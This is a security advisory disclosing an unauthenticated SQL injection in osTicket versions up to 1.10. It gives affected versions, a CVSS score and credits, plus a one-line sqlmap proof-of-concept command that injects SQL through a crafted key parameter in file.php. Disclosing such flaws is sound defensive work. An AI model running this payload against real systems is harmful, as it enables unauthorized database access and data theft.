42 lines
No EOL
1.2 KiB
Text
42 lines
No EOL
1.2 KiB
Text
1. ADVISORY INFORMATION
|
|
========================================
|
|
Title: osTicket v1.10 Unauthenticated SQL Injection
|
|
Application: osTicket
|
|
Bugs: SQL Injection
|
|
Class: Sensitive Information disclosure
|
|
Remotely Exploitable: Yes
|
|
Authentication Required: NO
|
|
Versions Affected: <= v1.10
|
|
Technology: PHP
|
|
Vendor URL: http://osticket.com/
|
|
CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
|
|
Date of found: 12 Sep 2017
|
|
Author: Mehmet Ince
|
|
Advisory:
|
|
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
|
|
|
|
2. CREDIT
|
|
========================================
|
|
This vulnerability was identified during penetration test
|
|
by Mehmet INCE from PRODAFT / INVICTUS
|
|
|
|
3. VERSIONS AFFECTED
|
|
========================================
|
|
osTicket < 1.10
|
|
|
|
5. Technical Details & POC
|
|
========================================
|
|
Please visit an advisory URL for technical details.
|
|
|
|
PoC code:
|
|
python sqlmap.py -u "
|
|
http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL
|
|
|
|
6. RISK
|
|
========================================
|
|
The vulnerability allows remote attackers to execute a sql query on
|
|
database system.
|
|
|
|
7. REFERENCES
|
|
========================================
|
|
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/ |